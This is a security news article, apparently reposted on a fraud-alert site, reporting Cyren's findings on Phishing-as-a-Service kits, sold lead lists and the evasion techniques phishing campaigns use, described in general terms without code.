Before adding and sharing your Fraud Alert please check to see if a similar alert has already been posted, thank you:

Phishing-as-a-Service Fuels Evasion Methods, Email Scam Growth

Post a Fraud Alert:

With much of the world’s corporate communication being done through email, scammers increasingly target corporate users with phishing scams that allow them to steal credentials that can be used for BEC scams, social engineering, or to steal corporate secrets.

In the past, phishing campaigns required threat actors to have some technical knowledge to utilize phishing kits, compromise sites to host the phishing landing pages that are used to steal credentials, and to create realistic spam campaigns.

To overcome this barrier of entry, new criminal sites are being developed that provide a Phishing-as-a-Service that includes a phishing kit and hosting for phishing forms at a very low cost. This allows would-be criminals with little technical knowledge to easily get started with their own phishing campaigns.

Phishing-as-a-Service drives growth

Instead of hacking into servers to host landing pages and developing their own phishing kits, new Phishing-as-a-Service (PhaaS) sites are being created where criminals can select from a variety of phishing landing pages and hosting for one month.

The phishing templates that are available include Sharepoint, Office 365, LinkedIn, OneDrive, Google, Adobe, Dropbox, DocuSign, and many more. These templates range from $30 to $80 and include one month of hosting for the page.

Available Phishing Landing Page Styles

According to a new report by cloud-based security provider Cyren, these new services have enabled the rapid growth of new phishing campaigns being created.

“Today’s reality is that we are seeing more evasive phishing campaigns in the hands of more attackers at less effort and lower cost than in the past, as technically sophisticated phishing attack developers have adopted a SaaS business model to let even the most amateur criminal wanna-be spoof targeted web sites with a high degree of authenticity and embedded evasive tactics,” stated the report by Cyren.

For example, Cyren security researcher Magni Sigurdsson shared with BleepingComputer a PhaaS offering that describes themselves as a “private service provider” for the hosting of spam pages.

“We are a private service provider that giving client solution for the hosting spam page. what we do is we warranty our costumer link host 1 month, we provide client with 3 link as backup the client can use two link as backup if the link die or reported as phishing. costumer can come back and report 3 of the link are die or reported phishing (RED) and we provider another 3 link as replacement”

These services guarantee that the phisher’s landing pages will stay alive for one month. Whether or not this is true or if they swap from one compromised host or cloud provider to another as they are detected is unknown.

Using a PhaaS service, scammers just need to focus on the spamming of emails and no longer have to worry about the setting up of phishing kits and hacking sites to host their landing pages.

To make it easier to conduct the spam campaigns, the PhaaS services also sell email lists, or what they call leads, that can be used to target a certain demographic of users.

Spam Email Lists

For example, the “FRA France Leads” package shown above is described as containing “1.5 millions plus France leads” that are “country verified and genuine”.

Pricing for these leads is not readily available and buyers need to contact the site owner’s via ICQ to get pricing.

Advanced methods and increasing evasion

With Phishing-as-a-Service sites helping to drive the growth of phishing campaigns, users and security software have become better at detecting them. Due to this, threat actors have had to come up with more innovative methods to get people to click on the enclosed links and to evade detection.

For example, we have recently seen phishing campaigns pretending to be mail account deletion notifications, undelivered mail prompts, and fake voice mail messages.  All of these emails are designed to drive the user to click on the enclosed link that leads to landing pages asking for login credentials.

Voice Mail Phishing Scam

In order to avoid detection by machine learning and security software, phishing campaigns are increasingly utilizing evasion techniques.

According to Cyren, 87% of the phishing campaigns that they detect are now utilizing evasion techniques to try and bypass detection. The evasion techniques being utilized are described below:

HTML character encoding: This technique encodes the HTML of the phishing scam to appear as gibberish to automated scanning engines, but look readable to a web browser or email client.

Content encryption: Instead of encoding the HTML, this technique actually encrypts the data and then uses JavaScript to decrypt it when viewed in a web browser.

Inspection blocking: Phishing kits will block various IP addresses, browser user agents, or referers from accessing the landing pages. This is an attempt to block automated systems used by Google, antivirus engines, or security providers from properly reading the page. This is commonly done using htaccess files with prebuilt signatures that redirect certain visitors to another site as shown below.

htacess File

URLs in attachments: Instead of hosting the phishing landing page URLs in the emails, they include them in attachments hosted on other services or attached to the email.

Content injection: This technique uses a legitimate, but compromised, site that contain a script that redirects targeted users to a landing page.

Legitimate cloud hosting: Phishing scams are increasingly using legitimate cloud service providers such as Azure to host their landing pages. Doing so allows the landing pages to be hosted on Microsoft branded URLs such as to make the scam pages look legitimate. Furthermore, these pages are secured with a certificate owned by Microsoft.

This is especially useful for landing pages that attempt to steal credentials for Microsoft services such as Microsoft Accounts, OneDrive, Outlook, and Office 365.

Azure Hosted Landing Page

These techniques appear to be working as reports indicate that phishing campaigns increased by 17% in the first quarter of 2019, 25% of phishing emails bypass Office 365 security, and that the criminals are raking in a lot of profits.

Related Articles:

Phishing Scam Says You Won $2.5M For Using Google’s Services

Phishing Scam Asks You to Login to Read Encrypted Message

New Android Trojan Leads Users to Scam Sites via Notifications

New Extortion Scam Threatens to Ruin a Website’s Reputation

New Spam Campaign Controlled by Attackers via DNS TXT Records

Article source: